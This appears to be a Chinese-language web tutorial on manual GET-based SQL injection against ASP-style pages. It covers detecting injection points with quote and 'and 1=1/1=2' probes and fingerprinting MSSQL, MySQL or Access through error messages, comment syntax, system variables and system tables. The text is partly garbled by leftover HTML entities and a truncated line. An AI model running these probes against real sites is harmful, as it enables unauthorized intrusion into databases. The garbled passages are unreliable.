sql注入查mysql表名_GET型SQL注入（注入点和数据库类型的判断）

网页一般为asp,php,jsp,aspx注入

对于GET型的SQL&＃xff0c;语句一般为

select * from 表名 where 字段&＃61;YY

YY可为整数型&＃xff0c;也可为字符型&＃xff0c;因而在执行sql语句时是有很大区别的。

select * from 表名 where 字段&＃61;12

select * from 表名 where 字段&＃61;&＃39;abc&＃39;

这使得在判断是否存在注入点时&＃xff0c;构造的语句也有很大的区别。

注入点的判断&＃xff1a;

先输入&＃39; 检测&＃xff0c;如果&＃39;有过滤的话&＃xff0c;输入and 1&＃61;1 ,and 1&＃61;2

1、整型参数的判断

当输入的参数YY为整型时&＃xff0c;通常abc.asp中SQL语句原貌大致如下&＃xff1a;

select * from 表名 where 字段&＃61;YY&＃xff0c;所以可以用以下步骤测试SQL注入是否存在。

①HTTP://xxx.xxx.xxx/abc.asp?p&＃61;YY’(附加一个单引号)&＃xff0c;此时abc.ASP中的SQL语句变成了

select * from 表名 where 字段&＃61;YY’  abc.asp运行异常&＃xff1b;(比如提示页面不存在)

②HTTP://xxx.xxx.xxx/abc.asp?p&＃61;YY and 1&＃61;1,

abc.asp运行正常&＃xff0c;而且与HTTP://xxx.xxx.xxx/abc.asp?p&＃61;YY运行结果相同&＃xff1b;

select * from 表名 where

字段&＃61;YY and 1&＃61;1  abc.asp运行正常

③HTTP://xxx.xxx.xxx/abc.asp?p&＃61;YY and 1&＃61;2, abc.asp运行异常&＃xff1b;

select * from 表名 where

字段&＃61;YY and 1&＃61;1  abc.asp运行异常

如果以上三步全面满足&＃xff0c;abc.asp中一定存在SQL注入漏洞。

2、字符串型参数的判断

当输入的参数YY为字符串时&＃xff0c;通常abc.asp中SQL语句原貌大致如下&＃xff1a;

select * from 表名 where 字段&＃61;&＃39;YY&＃39;&＃xff0c;所以可以用以下步骤测试SQL注入是否存在。

①HTTP://xxx.xxx.xxx/abc.asp?p&＃61;YY’(附加一个单引号)&＃xff0c;此时abc.ASP中的SQL语句变成了

select * from 表名 where 字段&＃61;YY&＃39;&＃xff0c;abc.asp运行异常&＃xff1b;

②HTTP://xxx.xxx.xxx/abc.asp?p&＃61;YY&＃39; and &＃39;1&＃39;&＃61;&＃39;1,

abc.asp运行正常&＃xff0c;而且与HTTP://xxx.xxx.xxx/abc.asp?p&＃61;YY运行结果相同&＃xff1b;

select * from 表名 where

字段&＃61;&＃39;YY&＃39; and &＃39;1&＃39;&＃61;&＃39;1&＃39;  abc.asp运行正常&＃xff1b;

③HTTP://xxx.xxx.xxx/abc.asp?p&＃61;YY&nb ...

39;1&＃39;&＃61;&＃39;2&＃39;, abc.asp运行异常&＃xff1b;

select * from 表名 where

字段&＃61;&＃39;YY&＃39; and &＃39;1&＃39;&＃61;&＃39;2&＃39;  abc.asp运行异常&＃xff1b;

如果以上三步全面满足&＃xff0c;abc.asp中一定存在SQL注入漏洞。

数据库类型的判断&＃xff1a;

1、可以根据输入非法字符时报的错来判断&＃xff0c;有时报错时就暴露了数据库的类型

比如它希望GET的是一个整数型的&＃xff0c;你输入一个字符的&＃xff0c;那么可能会出错&＃xff0c;有时直接输入&＃39;报错就暴露了数据库类型

2、有时利用--和#

这两个注释符号也可以大致的确认数据库类型&＃xff0c;因为MSSQSL是--&＃xff0c;而MYSQL是#&＃xff0c;ACCESS不支持注释

HTTP://xxx.xxx.xxx/abc.asp?p&＃61;YY--  异常

HTTP://xxx.xxx.xxx/abc.asp?p&＃61;YY#  正常

那么数据库有可能就是MYSQL或者ACCESS

3、利用数据库服务器的系统变量进行区分

SQL&＃xff0d;SERVER有user,db_name()等系统变量&＃xff0c;利用这些系统值不仅可以判断SQL-SERVER&＃xff0c;而且还可以得到大量有用信息。如&＃xff1a;

HTTP://xxx.xxx.xxx/abc.asp?p&＃61;YY and user>0

出错时报的错可能就包含了MSSQL的信息

如:Microsoft OLE DB

Provider for SQL Server error &＃39;80040e07&＃39;

不仅可以判断是否是SQL-SERVER&＃xff0c;而还可以得到当前连接到数据库的用户名

4、利用系统表

ACCESS的系统表是msysobjects,且在WEB环境下没有访问权限&＃xff0c;而SQL-SERVER的系统表是sysobjects,在WEB环境下有访问权限。对于以下两条语句&＃xff1a;

①HTTP://xxx.xxx.xxx/abc.asp?p&＃61;YY and (select count(*) from

sysobjects)>0

②HTTP://xxx.xxx.xxx/abc.asp?p&＃61;YY and (select count(*) from

msysobjects)>0

若数据库是SQL-SERVER&＃xff0c;则第一条&＃xff0c;abc.asp一定运行正常&＃xff0c;第二条则异常&＃xff1b;

若是ACCESS则两条都会异常。